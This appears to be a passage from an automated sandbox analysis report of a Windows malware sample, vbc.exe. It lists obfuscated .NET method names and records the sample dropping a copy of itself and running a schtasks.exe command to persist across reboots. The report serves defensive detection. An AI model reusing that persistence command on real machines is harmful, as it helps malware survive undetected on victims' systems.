Source: 0.0.vbc.exe.6f0000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 0.0.vbc.exe.6f0000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 0.0.vbc.exe.6f0000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 0.0.vbc.exe.6f0000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 0.0.vbc.exe.6f0000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 0.0.vbc.exe.6f0000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.5.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.5.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.5.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.5.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.5.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.5.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.5.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.5.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.2.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.2.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.2.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.2.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.2.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.2.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.2.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.2.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.7.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.7.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.7.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.7.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.7.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.7.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.7.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.7.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.0.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.0.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.0.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.0.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.0.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.0.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.0.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.0.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.9.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.9.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.9.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.9.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.9.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.9.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.9.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.9.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.3.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.3.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.3.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.3.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.3.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.3.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.3.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.0.vbc.exe.d10000.3.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.2.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.2.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.2.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.2.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.2.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.2.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.2.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'
Source: 8.2.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.1.unpack, AgtYC0svqpyDJ8D48N/QD9BnHxR7XV0qd12wU.cs	High entropy of concatenated method names: '.ctor', 'dsPTSCO1H', 'oWOSSrv9j', 'OfJB10hGMl', 'em1pANRQl', 'yqfAGlMVJ', 'yuA5vrsqr', 'RfwuSlvN8', 'moU97dL0i', 'qdJ6qO881'
Source: 8.0.vbc.exe.d10000.1.unpack, bgCsMdhQmIvRTrWrpc/e6E9VSj1iOUxvv1i5W.cs	High entropy of concatenated method names: '.ctor', 'XIBxdh8Ly9', 'DataRead', 'l37xZatdoJ', 'Dispose', 'proxqCZymk', 'yuVxVmWmTi', 'He3xbZMoHa', 'zIOxRLhoDl', 'rxcxeXmAaP'
Source: 8.0.vbc.exe.d10000.1.unpack, OXBSoeGuXHDwBfdJeI/qdJqO8F81xeleYnv0b.cs	High entropy of concatenated method names: '.ctor', 'bDqxIxJ4TM', 'DataRead', 'Dispose', 'PdgxvAiEfo', 'TDYvYixo7mKMhYVQuv', 'X0url2Onwcd52L7v7y', 'IrFSQu5xffnZPwWV1h', 'sEq7IjgES5aE4EbmeX', 'qEM3mgZLeVGT8tJfC8'
Source: 8.0.vbc.exe.d10000.1.unpack, ARIcU5phZuuJGy8f4N/p3eXr0J4vbXIXcOyyG.cs	High entropy of concatenated method names: 'QiwxzBO2nk', 'LD0sx7QshV', 'wUCssq3bga', 's3isYBTP5h', 'KqKsNi4Mns', 'bgcsmS6xax', 'yRRsOgfYNJ', '.ctor', 'sdLsHdMRFN', 'IS2s24dQar'
Source: 8.0.vbc.exe.d10000.1.unpack, kCCmX5M5ywooU7dL0i/QCpuAvorsqrefwSlvN.cs	High entropy of concatenated method names: 'uvf2wUDeWh', 'Kbm2rmq0u3', 'qjW2EGi83Q', 'uGU2zZYrcs', 'NXUxOKjOTP', 'hHCxHKlP66', 'rkSx2JhFE7', 'IYlxxdHdvs', 'SZXxsdRmD7', 'tCIxa2TWf4'
Source: 8.0.vbc.exe.d10000.1.unpack, lN97os8sPSCO1HFWOS/lS6W61kAHRDpbNFrh3.cs	High entropy of concatenated method names: '.ctor', 'oEd2tMVCl4', 'GMC2dxyS1M', 'nPQ2qUavKx', 'P5D2RhgIBH', 'ymJ2KxW5JL', 'B6J2VGuG5u', 'JHV2vmLZZD', 'n4n2WShPe4', 'GxJmBDUs4Gq0f9E626'
Source: 8.0.vbc.exe.d10000.1.unpack, LEPY8IQG7o8c14QQID/sgNKEBNR5C8dvbjBk0.cs	High entropy of concatenated method names: '.ctor', 'ehxHyj0Ex1', 'pklH5YCURa', 'DE6HftF8qk', 'kQeH9DJSPf', 'lEwHgo6H2W', 'RSiHltQY6q', 'h8fHDf67gk', 'XlWH7PHx4w', 'NZMHcQpXn1'
Source: 8.0.vbc.exe.d10000.1.unpack, mIbtk3Ya1lo8WeoMB2/fOV2XXaiMao7N0Xw6p.cs	High entropy of concatenated method names: '.ctor', 'r9MH3yu5ux', 'sK0HkP5CcO', 'iAQH1SWmNo', 'Xo2H4EKrct', 'KEbHMooGkJ', 'bhrHF66gwD', 'UevHnU902f', 'CHSHB4sRh8', 'vfJHUQVM7X'

Source: C:\Users\user\Desktop\vbc.exe

File created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\vbc.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
